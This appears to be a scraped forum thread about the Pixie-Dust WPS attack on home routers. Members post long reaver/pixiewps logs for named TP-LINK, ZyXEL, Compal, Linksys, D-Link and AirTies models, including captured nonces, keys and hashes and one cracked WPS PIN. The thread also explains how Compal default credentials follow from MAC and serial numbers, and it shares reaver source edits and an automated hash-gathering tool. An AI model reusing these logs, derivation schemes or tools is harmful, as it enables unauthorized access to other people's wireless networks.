.
Now , I have an information about F8:1A:67:XX:XX:XX mac adress (RTL 8671 ev 2006 07 27 chipset of TPLINK modems)
This mac adresses are mask ...F8:1A:67 is mask , FA:1A:67 orjinal mac..
Printable View
.
Now , I have an information about F8:1A:67:XX:XX:XX mac adress (RTL 8671 ev 2006 07 27 chipset of TPLINK modems)
This mac adresses are mask ...F8:1A:67 is mask , FA:1A:67 orjinal mac..
nope. Don't know, if this is ISP/Country specific, but (again) all testet Routers have the same PIN.
Here is the User-Manual, the WPS Menu is described on page 50.
if it's any use for anyone
TP-LINK TL-WR841ND v8.x
WI1 chip1: Atheros AR9341
Code:[P] E-Nonce: b0:74:6b:86:dd:ed:47:b7:63:2b:4c:12:12:d5:c1:4e
[P] PKE: cb:8b:ce:5a:3e:49:e1:f6:02:75:c2:cb:c4:cd:bb:48:1e:a0:e8:ea:95:85:c3:62:6c:c1:ec:e3:58:01:54:8b:55:f2:34:59:34:4a:3d:22:26:44:76:42:60:b8:a2:41:40:38:db:17:b1:0d:92:81:f5:c2:31:b4:d9:b1:50:41:70:5b:ce:58:34:3c:83:7a:99:26:66:da:be:6b:ab:87:45:ea:2a:b3:11:9a:b0:de:73:df:9f:65:24:3d:75:cd:f7:63:8a:d7:9f:21:ae:60:63:fd:1c:0a:62:e1:6c:63:cc:4a:63:1a:aa:e3:28:c5:88:d7:7e:49:53:1b:be:7a:2c:d7:2c:1b:bf:72:74:29:3e:5a:77:e7:ad:55:bd:84:6b:dd:0a:56:81:ce:e4:10:d0:ab:16:9a:2a:f8:bc:92:52:30:4f:f1:74:9e:48:fd:2e:ea:01:de:f9:96:3d:75:67:c5:74:53:c2:37:06:13:8e:5f:c5:59:15:28:15:dc
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 8.0
[P] WPS Model Serial Number: 1.0
[+] Received M1 message
[P] PKR: 5c:a1:2f:f5:aa:4f:24:c2:c4:9b:b1:75:23:0b:66:63:50:d0:d3:33:7e:6d:28:01:1d:13:e4:04:d6:22:1b:a8:51:d9:33:fe:26:a6:00:f2:b0:b6:ef:fd:ea:8f:00:f9:23:ac:4a:a1:ec:ad:86:56:cf:62:2d:ea:74:f6:02:47:5f:e2:05:1c:19:2b:26:e0:33:fb:aa:3e:cc:e7:5f:4e:5f:f1:4f:c6:ff:71:ef:79:e1:ae:df:9c:4e:44:15:16:90:09:88:ba:0c:86:8e:87:12:13:d9:f6:ca:ac:d8:2b:be:41:8f:56:59:1b:12:22:16:e0:17:69:ee:9c:ce:c8:e4:b7:ca:1f:9c:71:8f:b0:2f:0e:c2:7d:80:41:ec:ed:d5:7c:d1:e8:0f:1d:36:0d:19:48:f1:71:e8:51:d4:31:87:d4:25:47:d9:2b:05:a6:44:0e:19:8c:fa:a9:96:3e:78:95:65:16:87:b3:7f:98:92:da:15:9c:5f:f5:44:f2
[P] AuthKey: 6d:ad:39:70:41:85:d1:99:b2:c2:be:62:67:7b:2e:cb:be:ff:b2:d1:23:e3:63:0a:fb:1d:6c:75:ad:9b:82:84
[+] Sending M2 message
[P] E-Hash1: 3b:1c:a3:7d:df:eb:90:b0:af:20:bd:72:82:6a:ab:01:3e:93:39:22:10:ff:a2:07:59:c3:ba:00:31:3a:3c:f5
[P] E-Hash2: ae:a5:9e:bc:13:53:aa:ce:7f:38:27:50:33:72:1a:c7:53:17:a1:59:12:57:e2:df:95:23:a0:4c:80:09:16:cd
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 1 s
Zyxel Keenetic vulnerable
unknown chpset
Code:[P] E-Nonce: 18:31:5b:b2:69:e3:1a:c1:55:8f:e5:6d:7d:41:9b:3b
[P] PKE: 71:51:cd:92:d8:61:05:50:1e:15:15:6b:f1:a9:d8:5b:49:cf:a0:9e:9d:00:2a:7a:21:91:94:0e:ac:15:d3:44:58:2f:c8:61:3d:ce:f8:48:da:f6:ff:68:c2:8b:b5:20:61:e1:5d:8c:f2:57:60:a7:8f:3a:32:bf:69:5f:24:cc:e4:70:33:7f:12:3d:c6:88:02:ea:78:6b:9d:64:3f:b0:9d:68:65:e4:25:4e:e3:26:ab:73:ae:ea:b2:1c:6d:c6:b9:99:e0:7c:ea:18:56:3a:86:90:6e:78:a6:ea:6c:f6:6e:04:96:39:ef:04:2e:30:bc:96:c6:9f:1d:50:eb:82:a8:77:b6:b0:7b:43:bc:a6:57:75:62:93:64:7e:15:9d:14:96:e2:4c:9e:3c:71:31:ad:b9:e6:f5:5e:fe:98:85:ab:9e:3c:b3:d4:4d:5b:76:b6:f0:74:7b:ca:8c:d7:45:cc:b3:e6:93:a8:43:f8:1b:aa:f2:8c:35:47:68:cc:1b
[P] WPS Manufacturer: ZyXEL Communications Corp.
[P] WPS Model Number: KEENETIC series
[P] WPS Model Serial Number: none
[+] Received M1 message
[P] PKR: 62:dd:72:61:8b:fe:85:22:81:e5:2f:33:0f:e7:07:c3:a1:97:62:d7:69:7a:7d:dd:c6:1d:af:cf:f4:b5:83:31:42:6a:21:69:ec:d5:0a:15:16:ee:76:bf:9f:a7:fb:01:dd:64:ee:c7:42:41:f9:25:dd:ee:2c:88:9a:1e:3e:fa:a1:bb:97:8d:4a:33:25:d4:ff:f1:83:93:fe:98:c8:6a:90:2a:b0:f3:76:aa:6a:31:d5:18:16:dd:75:93:b9:e3:b9:39:4e:c8:ce:01:82:58:14:30:d8:92:af:6d:b4:69:29:ec:4b:52:e7:83:5c:3d:ae:a8:73:38:55:ac:87:76:85:c3:e8:8e:bd:ff:d9:b0:c1:3b:06:37:89:6e:ec:2b:75:24:1f:89:56:6d:79:27:9f:c9:02:00:32:b7:71:cf:ec:08:af:bc:ff:46:1f:aa:7d:c6:d6:bf:8d:b0:d2:ac:a9:02:ba:88:45:69:fc:81:fb:59:eb:15:bb:4a:23:44
[P] AuthKey: 9d:25:78:e1:27:48:12:fa:97:5f:aa:6f:3a:68:d2:86:3f:62:ec:c7:51:a1:df:02:87:f9:48:fd:56:fc:67:08
[+] Sending M2 message
[+] Received M1 message
[P] E-Hash1: 3e:08:b5:6b:9b:bd:cd:2e:07:b6:0b:76:ba:99:97:1a:f4:d9:38:11:09:f4:af:8c:3c:cd:dd:19:94:d7:b4:a7
[P] E-Hash2: c4:39:a8:b6:3b:67:80:32:0f:1c:62:f7:40:d8:4d:85:9f:02:e7:fc:5a:4a:85:a6:e8:8f:5b:0d:aa:55:b0:09
[Pixie-Dust]
[Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] PSK1: 7a:a9:99:5e:00:60:98:fd:91:37:2c:e9:f4:1c:67:11
[Pixie-Dust][*] PSK2: ce:81:5a:1b:39:ce:c3:07:86:59:21:71:0c:f4:a6:31
[Pixie-Dust] [+] WPS pin: 19048185
Sorry for off-topic, i've got further information about Compal:
MAC-Address 5C:35:3B:xx:xx:xx
cbn–zyy–xxx-xxx
Serial-Number: NNNNNxxxxxxxxx
In mine 8 cases, "N" is 53059.(Convert this Number (with leading zero)in HEX and you get 353B,Part of the MAC-Address.
The other 9 Numbers "x" are the last 6 Letters from the MAC-Address in Decimal.
And cbn should be something like „Compal Broadband Network“.
Later last Day i've got two Compal-Models with MAC-Address (DC:53:7C), each of them have a different Pin :
AND HERE:Code:[P] E-Nonce: 00:b1:56:19:7a:47:6b:c8:28:93:26:7b:73:87:41:43
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: f2:60:5d:f8:f9:f6:51:7b:50:12:9d:96:2d:67:45:96:40:57:9b:65:54:b0:37:45:c7:4d:e8:8b:0b:ee:4e:8a:c0:74:6c:15:e6:26:8b:a8:b2:e3:9b:61:29:c9:26:83:a7:35:2b:e2:84:e3:e3:6c:d5:40:a0:5e:49:37:66:95:4a:a8:9d:c2:e0:cd:7e:72:ac:52:48:1b:86:bb:47:9b:f9:d9:c8:b2:4b:12:0b:58:35:f1:2e:93:48:fa:38:2e:9c:5e:cd:a4:be:ba:f2:cf:e7:e0:e4:ba:bb:20:12:f1:c4:a0:8a:9c:02:ed:54:ac:26:a0:25:9a:b5:55:ad:92:ef:07:a8:09:c4:f1:38:36:c5:65:8c:98:70:cd:3e:ac:4f:76:79:90:64:f2:55:59:8e:8c:76:95:15:51:28:7d:f7:b8:b7:01:10:f4:48:a2:84:b1:20:f1:90:4a:4b:c8:af:23:58:de:5d:64:12:e8:ab:35:46:f2:4b:00:bb:3c
[P] AuthKey: 57:0f:2c:2d:b9:96:9a:ca:96:07:fd:86:c3:f2:b2:cd:7d:27:9b:d3:b4:a5:5b:89:65:62:3a:8a:51:a8:74:57
[P] E-Hash1: 2e:c6:22:b4:6e:cf:d7:cb:ec:bf:b1:bc:d1:91:76:75:a6:6a:84:52:3c:55:48:b1:cf:e2:27:da:e8:0c:c5:70
[P] E-Hash2: e6:28:3f:35:de:2d:a3:bd:4a:88:bc:2b:27:fa:24:22:58:0b:b9:ca:83:ba:75:dc:dd:6c:aa:81:5e:ce:61:e4
/\/\Code:[P] E-Nonce: 10:7b:c3:b1:65:cd:d7:fb:75:48:55:18:1c:3e:00:fc
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: cf:bc:97:7a:fe:b1:27:2c:4e:95:da:d1:92:87:01:70:8d:e3:f1:cc:f8:6c:1d:e6:26:23:c9:62:67:e0:37:71:8b:77:8b:c1:f4:ce:12:7b:f9:fb:0f:27:6f:78:99:77:27:2b:70:ce:b5:c9:41:d3:dd:07:d8:78:fc:d7:7d:45:2d:b9:f5:e2:33:40:67:20:66:68:12:0f:66:b3:bd:8b:e9:4e:57:f5:ca:ea:91:11:7a:fb:2c:bd:05:f5:59:ec:4e:5e:10:a5:04:20:59:bd:04:c5:6c:d1:28:7c:03:e5:c2:5c:ec:15:b9:98:e0:65:e8:07:2e:3f:f0:b7:05:29:a9:ad:a5:c6:f8:1c:a5:30:f0:1b:ea:d2:bb:23:c7:1b:e3:b4:0e:dd:65:a9:d2:98:4d:e8:28:bd:fa:ba:fe:dc:66:b5:ed:28:86:e1:59:97:f9:d9:4a:93:1f:fe:cb:86:30:c4:12:54:a1:cf:16:dc:e8:5d:9e:15:aa:a5:6c:bf
[P] AuthKey: 3c:1c:17:cb:bf:d0:e9:c0:95:c2:ef:64:04:64:c6:94:0a:c3:45:7d:f3:66:89:1e:69:9e:4f:a2:d0:6c:a3:6b
[P] E-Hash1: 24:ba:d7:f0:b9:7e:24:ae:f8:57:28:13:26:61:56:3d:67:6e:02:2f:8d:50:df:74:89:53:50:91:70:e9:b1:64
[P] E-Hash2: a6:ad:3b:e8:e0:ed:1c:06:9c:cc:4b:0b:f1:79:b6:af:f5:69:ef:97:ca:78:1e:01:68:1d:22:54:6f:57:d4:f1
NOT VULNERABLE:
Linksys WRT120n
Atheros AR9285
NOT VULNERABLE:Code:[P] E-Nonce: 6f:e3:4f:8b:e4:83:08:41:8d:5e:b8:98:cc:71:f2:8f
[P] PKE: f3:d3:80:1b:b8:f7:00:01:74:bb:3f:8d:dc:bc:17:ee:5f:e1:0e:c5:c3:ad:23:43:29:ad:b6:bc:7b:97:84:86:a2:ed:20:f9:5a:a6:72:64:1d:51:b9:da:7b:5d:e8:34:9b:a3:36:05:f1:6c:c4:8c:54:37:74:ed:d3:36:9e:e4:cc:08:e4:92:c6:ed:0f:e1:f1:c4:b8:36:bb:9d:03:97:01:89:ff:62:ce:2e:3f:38:1e:8d:fb:f1:85:9d:af:b5:16:99:ad:51:d5:03:d8:c3:77:f2:00:8c:7e:02:09:77:ef:31:58:33:13:da:3e:35:b4:67:77:ff:04:60:5f:fe:e5:0b:ff:a2:e3:fd:06:86:c1:b7:f8:bd:1b:a5:d9:45:c7:e4:d2:8e:20:99:66:4b:b3:62:0d:66:cc:ed:11:6b:d8:5c:fb:7b:1f:46:c9:7c:ae:e1:00:f1:e9:70:6b:69:22:bf:19:d8:e7:42:67:30:61:cb:f6:ad:9e:4e:44:84
[P] PKR: c5:b0:0a:28:4d:ba:ad:2f:05:ce:53:76:fa:fc:98:32:4a:ff:75:59:22:6e:06:aa:1f:15:be:48:bc:44:55:66:98:ea:a0:9d:d3:81:bd:df:53:55:6a:55:f0:68:63:1c:6a:b5:53:5a:3a:a6:5a:12:54:1f:82:4a:f0:7e:1a:9c:15:96:dd:0c:7b:e1:fa:ea:c1:e8:cc:5f:e0:0b:24:47:ee:1e:a8:84:d1:06:80:ea:e3:24:ac:40:66:29:7c:ae:79:66:42:00:c8:82:4a:b1:c9:a4:3a:04:34:b6:42:dc:4a:81:79:c1:40:c6:95:80:ff:75:60:2a:1a:62:da:a6:b2:c4:68:19:56:77:1f:0a:70:22:fe:3a:76:ac:ba:1d:9d:5b:2d:12:6b:a5:d5:18:7a:bb:5a:d4:3f:f2:59:6f:ca:f6:2b:5b:3b:f8:f1:92:e2:a7:57:4e:f5:f0:7a:a3:31:6d:6b:52:2a:85:84:71:51:c0:b2:11:7d:db:fc:15
[P] AuthKey: 81:fd:7e:7a:3a:53:76:0b:65:f9:1e:e9:fb:a1:1a:89:c4:98:b3:57:cb:1f:60:69:52:4e:6d:dc:2b:1f:6b:b2
[P] E-Hash1: a6:e9:dc:2d:19:d6:fe:e8:39:32:d9:83:69:b5:25:49:79:b8:70:27:4d:9b:b4:a1:93:e4:17:0c:36:9e:a0:fe
[P] E-Hash2: b7:73:33:9d:69:d8:d0:e0:fe:5c:1c:b1:a6:8c:41:a4:61:5e:57:3b:d0:92:86:96:e2:db:f5:e7:bf:56:fa:c5
D-Link 615 B2
Atheros AR5416/Atheros AR2122
Code:[P] E-Nonce: 6e:e4:ae:67:c5:46:86:65:6d:ab:0a:c9:90:2a:89:cb
[P] PKE: e2:4b:6c:da:3b:c9:9c:0a:1f:97:52:69:d4:55:2a:5e:85:fb:35:bd:f8:d1:47:a3:d3:53:5e:28:b8:ca:74:8f:0c:c2:8d:4c:18:f8:52:16:54:ee:da:bf:1d:c3:c4:15:a4:0d:24:96:a9:95:b2:28:d7:ec:a2:87:f8:b4:70:24:fc:aa:c7:33:bb:fd:b2:e8:ef:7a:df:07:70:d6:df:2c:8b:dd:d1:3b:f7:fa:1d:cc:53:35:a4:99:d8:77:41:dd:2e:7e:c4:2a:37:4d:6d:59:90:f5:ed:30:d7:93:82:cf:22:2b:9d:95:08:3d:cc:bf:cd:78:99:66:ac:a8:81:7f:32:33:63:ae:b6:16:f1:d4:e1:10:3f:08:64:f8:86:72:da:c6:97:53:f0:c7:07:c4:0e:2c:c7:48:30:cc:0b:f0:ba:27:8d:5c:39:4d:68:cd:3c:b3:19:13:03:7a:be:4d:b1:19:bd:f0:83:f8:40:88:82:c9:ee:94:7a:43:8d:2f
[P] PKR: 15:e1:31:80:df:2b:44:9a:9a:21:58:00:42:75:e9:22:23:ea:96:66:04:e0:0c:12:96:20:a4:51:55:59:2f:ac:ad:bf:e5:c6:60:30:3e:fd:fa:62:b0:cd:f9:26:e7:2a:c7:69:80:97:ce:f0:ec:6d:03:bb:c5:d2:44:f1:d4:bd:88:be:8f:e2:e7:69:42:10:21:9d:8d:da:d6:d9:58:c7:48:8c:80:4c:25:76:c4:d8:5b:6d:25:8d:d1:1e:08:ab:10:2b:c0:73:af:7e:a6:c0:0f:8c:4c:61:54:8f:11:fc:18:51:e5:af:62:c8:19:12:2e:6e:84:0f:35:ad:9b:d6:21:f7:31:f1:00:6e:55:df:5b:ac:67:cd:1a:36:7c:14:de:f6:e1:01:14:d1:e5:88:78:6c:9a:7a:0e:24:bb:b1:82:97:c9:06:1b:66:7f:50:41:d6:e6:80:e3:28:a7:b9:47:1b:1e:cf:0b:92:da:f8:50:92:94:de:fa:2e:6c:82
[P] AuthKey: 68:4a:a0:f1:48:81:32:6a:ec:22:e7:2d:4a:ff:4c:97:42:6c:f4:5c:1c:78:2f:05:73:bd:d4:e3:eb:9b:3a:e4
[P] E-Hash1: 2e:dc:77:bf:39:09:1a:44:a4:1d:45:28:12:64:c1:7d:ca:9e:f4:40:89:44:05:14:10:32:dc:b5:f7:73:24:c3
[P] E-Hash2: 26:4f:77:c9:c9:3e:34:a3:80:c4:07:b8:83:2a:66:a2:51:04:cd:e6:0f:6a:97:7a:4f:21:37:81:51:04:1e:1f
1. Which is the best tool for automated hash collection. Something we could use to gather hashes to send off for analysis, possibly find new holes for pixiewps.
2. Are hashes from locked routers, corrupt - no good 4 analysis?
3. Also any update on Realtek attack?
1.
The best way is simply to save a *.cap file with the PROBES and M messages and to add a *.txt file with the output of modified reaver.
In the case that the chipset and/or the model-manufacturer doesn't appear fully/dirreclty in the probes/stdout of modified reaver, please add manualy this information
2.
They are not corrupted but you need to get m1-m2 and m3 and you will not get this full sequence on a locked router (until it is unlocked again).
3.
Do you know how to "disassemble" firmware? i am stuck and need some help, i found something very interesting on unsupported realteck in parts that can be disassembled easly with binwalk from craig heffner.
basically there is a little *.sh script on startup that generate 4 things ( or check if theses four things have been generated correctly and generate them if that not the case) and one of them is the default WPS PIN.
on this devices the PIN is permanent/unconfigurable http://pix.toile-libre.org/upload/or...1430055858.png
Help would be appreciated
Gonna take a look at wireshark, try and figure it out.Quote:
The best way is simply to save a *.cap file with the PROBES and M messages
kcdtv, appreciate the responses -very interesting.
Hope someone is developing a tool to automate the process, for noobs. If made easy for noobs like me, we can help build the data collection pool.
i use a modified reaver-src. if i set the -o $logfile switch, reaver writes only the pixie-data in the logfile:
For AuthKey make the following changes:
change :
to :Code:wps_common.c: printf("[P] AuthKey: ");
and add a new line in wps_common.c (under #include "wps_dev_attr.h) with:Code:wps_common.c: cprintf(VERBOSE, "[P] AuthKey: ");
And for Messages, you don't need (Here the M1 received Msg):Code:#include "../misc.h"
replace:
with:Code:exchange.c: cprintf(VERBOSE, "[+] Received M1 message\n");
i'll search with grep for all reaver messages, and change everything, which is not important for the output-file.Code:exchange.c: printf("[+] Received M1 message\n");
Not the perfect way, but it works ;)
I do have a fork of autopixiewps i modified a while back that does hash collections, and then produces also a shell script. Ill update my fork in my github repo ( github user name: d8tahead ).
It saves generic reaver output of model info, collects hashes, and produces shell script for coresponding hashes with pixiewps And gives each segment an ID#.
edit:
The one in my repo is a little old, ill update it soon
will post asap
Edit #2:
i had strip out some things from the code, but it should still work fine :)
autopixie has been updated in my repo:
https://github.com/d8tahead/AutoPixieWps
and you will need the new reaver t6x fork ( i added addition of R-Nonce for future pixiewps ) :
https://github.com/t6x/reaver-wps-fork-t6x
for my fork of autopixiewps for the hash gathering, you will need to enable option #5 on the main menu before the wash scan ( pixiehash gathering mode ).
also please note that the logs will be saved as essid and bssid and the prefix of PixieHash in the executing directory!
so be sure to cd to whichever directory you would like the hashes to be saved if executing from a shell.
remember to make autopixiewps.py executable!
after last ur update reavet doesnt work pixiewps: invalid option -- 'm'
İSSUE : ??
I look all pixie test post in this title ... Some modems are invulnerable because manufacturer, wps model numbers are FALSE.!
Example :
Wps Manufacturer : TPLINK
WPs model nambur :1
Tplink uses Realtek and Atheros chipset...
True value :
Wps manufacturer : Atheros
wps model number : WR740..
Other example:
WpsManufakturer : Realtek semicondukter,
Wps Model number : EV-2006-07-27...
Not "EV-2006-07-27" model number , true value :RTL8671
Can someone please tell me how to make reaver delay between sending M1 and M2?
Dependencies
[code]
sudo apt-get install libssl-dev
sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev
Couldnt get the libssl-dev its forbidden in repository as kali is unable to update
im running latest live ver. but still can get the package.
pixie is unable to install without ssl.
help me......:confused::confused::confused::confused:
What fixes, improvements will pixiewps 1.1 bring?
How did you get this PIN ?
I will try it later this week because I'm travelling right now.
Thank you.
Sounds good. Great work everybody involved.
Got my first belkin today. first pin generated was the correct one.
With pixie dust or the pin generator? Model number?
with the -W1 option. :o
Hi,soxrok... I see APPs on wireshark.. And there is problem... Pixie sees wrong values..Look screenshots..
http://imgur.com/XslVDB6Code:Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 07:34:36:3e:4a:0e:38:df:e7:cd:fa:15:85:92:9e:71
[P] PKE: 0d:da:3b:db:55:f3:68:cf:55:2b:98:93:18:0a:f4:77:28:58:3d:45:25:58:0a:35:f0:5c:b3:89:7e:3e:3a:f9:dc:49:0a:dd:7f:f0:bb:61:3d:20:8a:fb:d7:d7:17:d0:fa:94:ad:26:5a:8d:70:9e:a1:3c:7f:cb:69:9c:a1:a7:f7:b5:d7:bf:6b:d4:fb:7c:e4:51:fb:f9:6b:9c:ef:5b:94:6c:7d:7a:4e:40:11:49:83:3d:bb:84:2a:cc:23:f9:3c:63:7f:af:70:4b:28:33:ea:f5:f5:05:38:19:76:09:8c:6a:8b:37:9e:27:ec:63:96:c1:f4:ab:23:27:d9:57:30:3b:b9:9d:55:e9:76:5d:81:5c:07:b4:8c:90:0c:02:37:9c:2f:f7:2d:6f:5b:b2:a0:4f:ee:9a:88:a1:1f:f4:3f:bd:78:6f:d5:8a:48:6f:fe:c7:b7:c2:da:9e:68:b8:35:0e:3e:e5:f3:4d:e1:4b:5f:b0:08:c9:d4:9e:a7:93
[P] WPS Manufacturer: AirTies Wireless Networks
[P] WPS Model Number: 1.0.2.0
[P] Access Point Serial Number: AT1731434014674
[+] Received M1 message
[P] PKR: 07:a0:3b:9f:28:60:17:1f:38:52:9e:7e:0b:5f:ef:04:62:15:b6:86:05:cb:4b:ee:f4:64:4f:a1:fd:35:da:3e:54:a6:26:c7:93:2a:b5:00:1c:e7:81:37:58:e8:ec:d1:fb:08:3a:f3:44:53:64:a1:41:02:25:ed:41:87:a5:85:aa:c6:98:87:7c:41:8f:a0:e6:96:0b:52:b3:bf:18:05:00:18:16:f0:4c:12:41:e1:bc:ca:e5:12:d0:67:2a:99:cb:04:2f:bb:21:22:9b:99:38:13:5b:ed:44:52:4e:f8:35:81:9f:98:63:f7:98:d9:6a:6f:a2:e8:3b:71:13:cd:e4:6a:b9:3e:51:d2:43:7f:a1:eb:7f:6a:74:5b:06:b2:29:55:5e:c9:27:36:a9:d7:1a:e0:3e:78:35:63:68:33:10:8c:44:64:96:86:96:03:74:d8:59:df:47:03:26:e3:5c:5b:93:18:ac:71:39:29:c5:4e:98:ef:3e:77:73:6a
[P] AuthKey: 99:58:17:50:f0:15:e3:c8:aa:75:c0:0f:fe:47:d7:b8:e8:f7:bf:af:9d:8a:64:91:74:1c:6f:36:21:1d:72:d5
[+] Sending M2 message
[P] E-Hash1: 80:3f:98:56:4f:6c:f7:64:bf:e9:39:9a:d9:39:24:04:7b:b4:84:44:48:81:6a:6b:e3:ba:c5:ee:86:c5:d1:32
[P] E-Hash2: 79:d2:d0:6a:0e:12:82:d8:ae:9f:32:aa:21:95:07:ef:45:12:78:a6:ba:60:c2:aa:24:a2:db:b2:ca:51:8b:bb
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 2 s
[Pixie-Dust]
http://imgur.com/fnrrZUnCode:Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 6a:34:66:5e:16:2c:db:cb:5b:11:f7:cc:78:a3:a0:c9
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] PKR: 19:fc:9c:fb:93:99:c3:5b:96:d8:d1:71:92:2e:64:89:85:5e:b8:c2:51:cc:f0:3d:e5:87:ef:8a:4d:5b:fd:63:bb:4d:ac:1d:d5:fd:ec:a6:ab:f2:35:80:33:bc:c9:61:4f:f5:6b:51:ce:1c:64:dd:c8:e2:a2:aa:98:5d:b0:8c:fe:90:1f:db:fb:a1:13:ec:55:29:4f:3e:49:3a:80:62:4d:fe:77:9e:6e:78:25:5f:5d:30:8f:34:20:2a:28:82:2f:08:23:af:86:79:29:1c:be:e8:75:af:c8:a7:e9:90:52:2a:15:cd:49:21:c0:00:62:91:3e:1e:94:11:55:92:28:54:81:89:f9:af:99:b8:f4:7a:29:80:0a:92:69:18:63:97:5f:85:73:51:af:9b:63:fb:a3:dc:0e:7d:eb:2b:23:3d:8b:4f:50:e5:eb:9b:bc:7e:d6:2b:21:93:09:52:6b:8a:71:d0:33:31:6c:82:01:f3:ee:85:77:97:2c:ae
[P] AuthKey: 2b:da:97:bc:a7:06:a8:e9:94:6e:ff:f3:70:e3:84:8d:ec:48:ad:b0:ba:49:74:6b:a0:31:93:db:ac:71:9a:09
[+] Sending M2 message
[P] E-Hash1: 88:a0:55:ea:db:12:db:0d:f4:61:91:5c:3f:e7:11:07:6d:5a:1f:57:b2:7e:fc:6e:34:29:3f:2a:de:56:c8:74
[P] E-Hash2: 97:c4:d6:06:29:db:a1:bf:4c:e9:96:c2:ee:6f:dd:e6:df:b6:30:c1:20:68:e5:2e:d2:ef:d6:82:43:38:31:b6
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 2 s
[Pixie-Dust]
http://imgur.com/1MrIW4KCode:Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: da:42:7d:5e:4c:b6:a3:98:b5:f3:41:77:42:8e:a6:d8
[P] PKE: c6:bc:d8:bc:9a:be:0e:e3:ef:06:dd:55:bc:07:79:1b:56:32:76:fd:63:b9:b1:84:a6:6a:fe:ec:98:d8:d1:ae:62:fe:23:e1:c1:93:39:81:5a:ff:69:56:32:28:12:3e:2b:de:7a:d6:79:93:0a:b2:3a:fd:35:e2:03:2b:e7:4b:08:fc:81:76:c9:46:1a:8b:96:1a:f3:bf:85:99:f8:fb:d3:b5:91:a9:96:92:ad:fd:90:17:45:a6:34:9a:01:9f:a0:df:4d:a3:d4:0e:38:bc:79:b2:9e:38:c2:7b:5e:8c:97:b9:23:89:6c:91:e1:ae:82:bf:f0:86:06:ff:11:da:30:14:dc:39:28:c6:51:07:05:a3:b0:50:93:5b:50:44:8a:5f:19:e8:a7:2c:86:22:21:b4:2a:11:40:e7:e8:53:e5:0d:7f:b1:90:a2:01:c7:7a:5e:65:2a:cc:13:7d:3b:3c:00:67:00:ee:66:40:93:7e:7d:c9:0b:d8:62:fc:37
[P] WPS Manufacturer: ZyXEL
[P] WPS Model Number: P-660W-T1 v3
[P] Access Point Serial Number: 00000001
[+] Received M1 message
